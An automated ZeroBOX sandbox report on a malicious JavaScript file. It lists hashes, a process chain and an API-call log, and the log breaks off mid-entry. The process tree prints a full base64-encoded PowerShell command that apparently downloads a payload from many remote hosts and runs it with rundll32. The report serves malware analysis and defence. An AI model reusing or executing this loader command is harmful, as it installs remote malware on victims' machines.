popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

unthriftily.js

Generic Malware Antivirus Hide_URL AntiDebug AntiVM PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 May 24, 2023, 11:04 a.m. May 24, 2023, 11:06 a.m.
Size 224.6KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 3127d0f1530abf9479f6bbdb7bc3d87a
SHA256 20032f585b1170cebd621161beb9a36698636264b1e20f68d56931a14dfe30c6
CRC32 1CC13602
ssdeep 3072:j/seQmFP6G+XyAKOQ3uv1Xi4BahfeqW4u49daWf79kh4PtraTHZbCqS78gtb:j//3FPV+iAKO4QXijmqW4rTH4ZeqV2b
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\unthriftily.js

    3036

    • wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\subclan.js" unobliginglyPostpathologic NontraceableSchmalzy EyaletHardcopy EngraffedAnglophobist

      2404

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABQAHIAZQBzAGEAYwByAGEAbABEAHIAYQBnAGcAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAQQBBAEwAZwBBADUAQQBEAE0AQQBMAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE4AUQBBAD0AbABkAHcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABNAEEATABnAEEAeQBBAEQAQQBBAE0AUQBBAHUAQQBEAEUAQQBOAEEAQQB5AEEAQwA0AEEATgBBAEEAeQBBAEEAPQA9AGwAZAB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAUQBBAE4AQQBBAHUAQQBEAEkAQQBNAGcAQQA0AEEAQwA0AEEATQBRAEEAMgBBAEQAWQBBAEwAZwBBADQAQQBEAFkAQQAiADsAJABtAGUAdABhAGwAbABpAGsAZQBMAG8AZwBsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQA4AEEAZABnAEIAbABBAEgASQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEARwBVAEEAYwBnAEIARQBBAEcAawBBAFkAUQBCAG4AQQBIAEkAQQBZAFEAQgB0AEEARwAwAEEAWQBRAEIAMABBAEcAawBBAFkAdwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARwBJAEEAZABRAEIANgBBAEgAbwBBAHYAagBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEMAQQBHAFUAQQBZAFEAQgAyAEEARwBVAEEAYwBnAEIAbABBAEcAUQBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQA9AHYAagBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBZAFEAQgBwAEEARwB3AEEAWQBnAEIAdgBBAEcARQBBAGQAQQBCAHAAQQBHADQAQQBaAHcAQQB1AEEARwBNAEEAWQBRAEIAbQBBAEcAVQBBAHYAagBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAGsAQQBMAGcAQQAzAEEARABVAEEATABnAEEAeQBBAEQASQBBAE4AdwBBAHUAQQBEAFkAQQBOAFEAQQA9ACIAOwAkAGIAZQB0AGkAcgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBZAEEAWQBRAEIAcwBBAEcATQBBAFkAUQBCADAAQQBHAFUAQQBWAEEAQgAzAEEASABrAEEAWgBRAEIAeQBBAEgATQBBAEwAZwBCAHAAQQBHADgAQQBQAGoAZwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHgAQQBIAFUAQQBZAFEAQgBrAEEASABJAEEAYQBRAEIAdwBBAEcAZwBBAGUAUQBCAHMAQQBHAHcAQQBiAHcAQgAxAEEASABNAEEAVQBBAEIAdgBBAEcAdwBBAGIAQQBCADEAQQBIAFEAQQBaAFEAQgB6AEEAQwA0AEEAZABnAEIAcABBAEgAQQBBAFAAagBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBADAAQQBDADQAQQBNAGcAQQB4AEEARABZAEEATABnAEEAMgBBAEQASQBBAEwAZwBBAHgAQQBEAGcAQQBOAEEAQQA9AFAAagBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADEAQQBDADQAQQBNAFEAQQB6AEEARABZAEEATABnAEEAeQBBAEQASQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQQA9AD0AIgA7ACQAaAB5AHAAbwBpAG4AbwBzAGUAbQBpAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHADgAQQBjAHcAQgB6AEEARwBJAEEAWgBRAEIAeQBBAEgASQBBAGUAUQBCAFMAQQBIAFUAQQBiAFEAQgBpAEEASABVAEEAYwB3AEIAMABBAEcAawBBAGIAdwBCAHUAQQBDADQAQQBiAFEAQgB2AEEARwA0AEEAWgBRAEIANQBBAEEAPQA9AGwARwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBaAFEAQgB0AEEARwBrAEEAYwBBAEIAeQBBAEcAOABBAGIAZwBCAGwAQQBHAHcAQQBlAFEAQgBFAEEARwBrAEEAYQBBAEIANQBBAEcAUQBBAGMAZwBCAHYAQQBIAGcAQQBlAFEAQgBoAEEARwBNAEEAWgBRAEIAMABBAEcAOABBAGIAZwBCAGwAQQBDADQAQQBaAGcAQgBoAEEASABJAEEAYgBRAEEAPQBsAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABFAEEATABnAEEAeABBAEQAYwBBAE8AUQBBAHUAQQBEAEUAQQBOAHcAQQAyAEEAQwA0AEEATQBRAEEANQBBAEQASQBBAGwARwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQA1AEEAQwA0AEEATQBRAEEANABBAEQASQBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABZAEEATwBBAEEAPQAiADsAJABDAHkAdABvAGcAZQBuAGUAdABpAGMAUABvAGUAdABpAHoAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGIAQQBCAGgAQQBHAGsAQQBkAEEAQgBvAEEARwBVAEEAYwB3AEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAbABBAEgATQBBAEkAZQBQAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABNAEEATQB3AEEAdQBBAEQARQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQAxAEEARABNAEEATABnAEEAeQBBAEQATQBBAE0AZwBBAD0AIgA7ACQAVABpAG4AZwBlAG4AdABVAHAAZABhAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE4AUQBBAHUAQQBEAFUAQQBPAFEAQQB1AEEARABJAEEATQBnAEEAdwBBAEMANABBAE0AZwBBAHcAQQBEAEUAQQBMAHcAQgBTAEEASABZAEEATAB3AEIAVABBAEYASQBBAE4AdwBCAEkAQQBBAD0APQBRAGkAcgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADQAQQBEAGMAQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQARQBBAE4AdwBBADQAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATAB3AEIANgBBAEUAWQBBAGEAdwBCADUAQQBDADgAQQBkAEEAQgBhAEEARQBjAEEATQB3AEEAMABBAEEAPQA9AFEAaQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAMwBBAEMANABBAE4AZwBBADQAQQBDADgAQQBPAFEAQgBEAEEARwAwAEEATwBRAEIARgBBAEYAYwBBAEwAdwBCAEwAQQBIAGMAQQBVAHcAQgA2AEEARwBNAEEAYQBBAEIAMwBBAEEAPQA9AFEAaQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAMwBBAEMANABBAE8AUQBBAHkAQQBDADgAQQBTAGcAQgBVAEEARwBrAEEATAB3AEIAeABBAEYAVQBBAGQAUQBCAFQAQQBIAE0AQQBZAFEAQgBYAEEAQQA9AD0AUQBpAHIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEgATQBBAFUAQQBCAGkAQQBHAHMAQQBiAGcAQgBzAEEARQBRAEEATwBRAEIAdQBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFUAcgBiAGkAYwBvAGwAYQBlAEcAZQBuAGUAdABoAGwAaQBhAGMAaQBzAG0AIABpAG4AIAAkAFQAaQBuAGcAZQBuAHQAVQBwAGQAYQB0AGUAIAAtAHMAcABsAGkAdAAgACIAUQBpAHIAIgApACAAewAkAGMAaABlAG4AaQBlAHIAUwB3AGkAbgBnAGwAZQB0AGEAaQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAZABBAEIAcABBAEcANABBAFoAdwBCAGgAQQBIAEkAQQBaAFEAQgBsAEEARwBrAEEAYgBnAEIAbgBBAEUAdwBBAFkAUQBCAG4AQQBHADgAQQBiAFEAQgB2AEEASABJAEEAYwBBAEIAbwBBAEcAOABBAGQAUQBCAHoAQQBDADQAQQBaAGcAQgBoAEEASABNAEEAYQBBAEIAcABBAEcAOABBAGIAZwBBAD0AVwB1AFcATABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHIAQQBHAHcAQQBhAFEAQgB3AEEARwBRAEEAWQBRAEIAagBBAEcAZwBBAGMAdwBBAHUAQQBHAEUAQQBiAFEAQQA9AFcAdQBXAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBRAEEAdQBBAEQAVQBBAE8AUQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABFAEEATgBRAEEANABBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJABnAHIAbwB1AG4AZABzAGsAZQBlAHAAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATQBnAEEAegBBAEQAZwBBAEwAZwBBADEAQQBEAEEAQQBMAGcAQQA1AEEARABnAEEAaQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCAGoAQQBIAEkAQQBiAHcAQgB2AEEARwA0AEEAVAB3AEIAMgBBAEcAVQBBAGMAZwBCADAAQQBHAEUAQQBhAHcAQgBsAEEASABJAEEATABnAEIAbQBBAEcARQBBAGEAUQBCADAAQQBHAGcAQQAiADsAJABIAGUAbABsAGUAYgBvAHIAaQBuAGUASABhAGkAcgBzAHQAcgBlAGEAawAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABVAHIAYgBpAGMAbwBsAGEAZQBHAGUAbgBlAHQAaABsAGkAYQBjAGkAcwBtACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQASABlAGwAbABlAGIAbwByAGkAbgBlAEgAYQBpAHIAcwB0AHIAZQBhAGsAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwATQBpAHQAaQBnAGEAdABpAG8AbgBUAHIAaQBtAG0AaQBuAGcAbAB5AC4AYwBsAGEAdQBzAGUAcwA7ACQAYgBhAHMAawBlAHQAdwBvAHIAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADUAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAMwBBAEQAWQBBAEwAZwBBAHkAQQBEAFEAQQBNAGcAQQA9ACIAOwAkAEUAcwBjAGEAbABsAG8AcABzAE8AdgBlAHIAYQBzAHMAdQBtAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABNAEEATwBBAEEAdQBBAEQASQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQB6AEEARABFAEEATABnAEEAMQBBAEQASQBBAGcAdwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHADQAQQBkAEEAQgBwAEEASABNAEEAWQBRAEIAMgBBAEcARQBBAFoAdwBCAGwAQQBFAGcAQQBaAFEAQgBoAEEARwBRAEEAYwB3AEIAbwBBAEcARQBBAGEAdwBCAGwAQQBIAEkAQQBMAGcAQgBqAEEASABJAEEAWgBRAEIAawBBAEcAawBBAGQAQQBBAD0AIgA7ACQAdABoAGUAcgBzAGkAdABlAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADUAQQBDADQAQQBPAEEAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQATQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQA9AEQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwA0AEEAWgBRAEIAMQBBAEgASQBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgBzAEEARwBrAEEAYgBnAEIAcgBBAEEAPQA9AEQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBRAEEAMQBBAEMANABBAE0AUQBBADMAQQBEAGcAQQBMAGcAQQB4AEEARABJAEEATQBRAEEAdQBBAEQARQBBAE4AQQBBADAAQQBBAD0APQBEAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAeABBAEgAVQBBAFkAUQBCAHoAQQBHAGsAQQBjAEEAQgBsAEEASABJAEEAYQBRAEIAdgBBAEcAUQBBAGEAUQBCAGoAQQBFAHcAQQBhAFEAQgAwAEEARwBVAEEAYwBnAEIAaABBAEgAUQBBAFoAUQBCAHMAQQBIAGsAQQBMAGcAQgBpAEEARwA4AEEAZABRAEIAMABBAEcAawBBAGMAUQBCADEAQQBHAFUAQQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABNAGkAdABpAGcAYQB0AGkAbwBuAFQAcgBpAG0AbQBpAG4AZwBsAHkALgBjAGwAYQB1AHMAZQBzACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA5ADkANwAxADIAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBFADAAQQBhAFEAQgAwAEEARwBrAEEAWgB3AEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBWAEEAQgB5AEEARwBrAEEAYgBRAEIAdABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQQB1AEEARwBNAEEAYgBBAEIAaABBAEgAVQBBAGMAdwBCAGwAQQBIAE0AQQBMAEEAQgAyAEEARwBrAEEAYwBBAEIAegBBAEQAcwBBAFQAUQBCAEoAQQBGAFEAQQBUAEEAQgBwAEEARwBNAEEAWgBRAEIAdQBBAEgATQBBAFoAUQBBAD0AIgA7ACQAYwBhAGwAbwBtAGUAbABzAEIAZQBuAHoAbwBwAHkAcgBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAGMAQQBMAGcAQQB4AEEARABNAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADUAQQBDADQAQQBPAEEAQQAzAEEAQQA9AD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBOAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADIAQQBDADQAQQBNAFEAQQB6AEEARABJAEEAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATQB3AEEAMgBBAEMANABBAE0AUQBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABVAEEAZgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAWQBBAEwAZwBBAHgAQQBEAEkAQQBOAFEAQQB1AEEARABFAEEATQBBAEEAMQBBAEEAPQA9ACIAOwAkAHMAYQB0AHUAcgBhAHQAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBBAEEAMgBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATABnAEEAeABBAEQATQBBAE4AQQBBAD0AIgA7ACQASgBlAG8AcABhAHIAZABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBjAHcAQgB3AEEARwB3AEEAWgBRAEIAdQBBAEcAawBBAGIAdwBCAHAAQQBHAFEAQQBUAEEAQgBoAEEASABBAEEAYwB3AEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBMAGcAQgAwAEEARwA4AEEAZQBRAEIAegBBAEEAPQA9AFQAZgBKAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATQBBAEEAdQBBAEQASQBBAE0AUQBBADQAQQBDADQAQQBOAGcAQQAzAEEAQwA0AEEATQBnAEEAeABBAEQATQBBACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7ACQAbgBvAG4AZQB4AHQAZQBuAHMAaQB2AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBiAHcAQgB5AEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGIAUQBCAEcAQQBIAEkAQQBkAFEAQgBuAEEARwBFAEEAYgBBAEIAcABBAEgATQBBAGQAQQBBAHUAQQBIAE0AQQBhAEEAQgB2AEEARwBVAEEAYwB3AEEAPQBMAEIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEANABBAEMANABBAE0AUQBBAHcAQQBEAFkAQQBMAGcAQQAwAEEARABRAEEATABnAEEAeQBBAEQATQBBAE4AUQBBAD0ATABCAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEcAOABBAGMAdwBCAHoAQQBHAGsAQQBaAFEAQgBUAEEASABVAEEAWQBnAEIAaQBBAEcARQBBAGMAdwBCAHoAQQBDADQAQQBhAEEAQgB2AEEARwBNAEEAYQB3AEIAbABBAEgAawBBACIAOwB9AH0AJABwAGUAcgBqAHUAcgBlAGQAbAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEANQBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQA0AEEARABRAEEATABnAEEAeQBBAEQAQQBBAE4AUQBBAD0AcABjAFcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATwBBAEEAdQBBAEQASQBBAE4AQQBBADUAQQBDADQAQQBNAFEAQQB4AEEARABjAEEATABnAEEAMABBAEQAQQBBAHAAYwBXAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFoAUQBCADAAQQBHAGcAQQBlAFEAQgBzAEEARwBVAEEAYgBnAEIAbABBAEYAVQBBAGIAZwBCAHcAQQBHAHcAQQBkAFEAQgBuAEEASABNAEEATABnAEIAcgBBAEcAawBBAGIAUQBBAD0AIgA7ACQAVQBuAGsAaQBsAGwAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABNAEEATABnAEEAeABBAEQASQBBAE0AdwBBAHUAQQBEAGsAQQBNAEEAQQB1AEEARABJAEEATQBRAEEAMQBBAEEAPQA9AFUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABNAEEATQBnAEEAdQBBAEQARQBBAE4AdwBBADQAQQBBAD0APQAiADsAJABIAG8AdABwAHIAZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB5AEEAQwA0AEEATgBnAEEANABBAEMANABBAE0AUQBBAHcAQQBEAGcAQQBMAGcAQQAzAEEARABjAEEAIgA7AA=="

        1140

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030aad8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a818
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a818
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a818
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a418
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a418
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a418
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a418
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a418
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a418
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00309f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00309f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00309f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a5d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
